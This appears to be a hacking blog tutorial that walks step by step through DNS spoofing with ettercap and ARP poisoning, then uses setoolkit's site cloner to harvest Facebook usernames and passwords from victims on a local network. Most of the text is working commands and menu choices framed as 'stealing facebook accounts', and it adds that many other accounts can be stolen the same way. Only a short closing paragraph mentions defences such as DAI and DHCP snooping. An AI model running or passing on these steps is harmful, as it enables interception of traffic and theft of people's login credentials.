I would like to briefly talk about DNS – Domain Name System – Domain name resolution system.
Join the channel Telegram belong to AnonyViet ???? Link ???? |
When you enter a web browser and type facebook.com, the DNS system will resolve it for you to an IP address so that you can communicate and transmit data on the network.
This article will be divided into 2 parts:
Part 1: Using ettercap to perform DNS Spoofing
Part 2: Using Setoolkit and Ettercap to steal facebook accounts.
Perform:
Part 1: Using ettercap to perform DNS Spoofing
First, I will ping facebook.com What is the IP address corresponding to the facebook.com domain name?
Next, go to Kali Linux and perform Enable IP Forwarding.
#echo 1 > /proc/sys/net/ipv4/ip_forward
Next edit the file etter.dns.
Use the locate etter.dns command to see where it is currently. Once done, proceed to add the following records:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
With the address 192.168.0.109 is the Attacker machine IP.
Note: May be located at /usr/local/share/ettercap/etter.dns with Backtrack 5 versions
When done, save and exit :wq
Perform dns spoofing with the command
#ettercap -T -q -M arp:remote -P dns_spoof //
Then go to the client machine, re-assign the address with the command >ipconfig /renew
Now go to the PC client to access facebook.com you will see it still accesses normally. But when pinging to facebook.com, the IP reply is 192.168.0.109 – Attacker’s IP.
OK. So you have succeeded in driving data through your computer, now we will proceed to steal Facebook account.
Part 2: Using setoolkit and ettercap to perform stealing facebook accounts.
Tools used:
setoolkit: clone website, capture username/password
ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (eavesdropping).
Demo video: Youtube
Instructions with pictures
Enable setoolkit
#/usr/share/set/setoolkit
Agree to terms of use Click y -> Enter
Select 1) Social-Engineering Attacks
Select 2) Website Attack Ventors
Select 3) Credential Harvester Attack Method
Select 2) Site Cloner
Enter the Attacker’s IP address: 192.168.0.109
Type the path you want to clone the website: https://www.facebook.com
When done, turn on another Terminal, type ettercap -G to enable ettercap configuration with the interface
Select Sniff->Unified sniffing
Select the port for eavesdropping: eth0
Select Hosts-> Scan for hosts
Host-> Hosts List
Choose 2 addresses to conduct eavesdropping
Implement ARP possoning (ARP spoofing)
Click select Sniff remote connections.
Enter /etc/ettercap/etter.dns Add 2 lines:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
Enter Plugins-> Manage the plugins
Click on dns_spoof to enable this feature
Start sniffing
On the client computer, open a web browser to facebook.com, enter username/password
setoolkit will catch this username/password
The username/password information is displayed in clear-text as above, so you already have the client’s facebook account.
Updated on September 15, 2015:
In the new version of Kali 2.0, when the clone site returns, it will be saved in the /var/www/ path, copy these files to the /var/www/html path then proceed normally:
Note: remember to change the permissions to read and write for these files:
#cd /var/www/html
#chmod 777 ./*
Includes 3 files:
– index.html : interface of facebook.com
– post.php: function to get username/password when you enter it and save it in haverster_*.txt file
– harvester_date_time.txt : save the obtained information.
In the same way you can steal many other accounts.
How to prevent DNS Spoofing:
In addition to the two ways in the article ARP spoofing is to deploy port-security and DAI, you should deploy more DHCP snooping to prevent fake DHCP levels.
P/s: As you have seen, if the attacker has entered our internal network with dark intentions, there are many tools to extract information about his company. Thus, if any employee intends to sabotage the company, it is quite difficult to investigate.
By the way, if you have any useful monitoring tools or programs, please share them with me.
Close,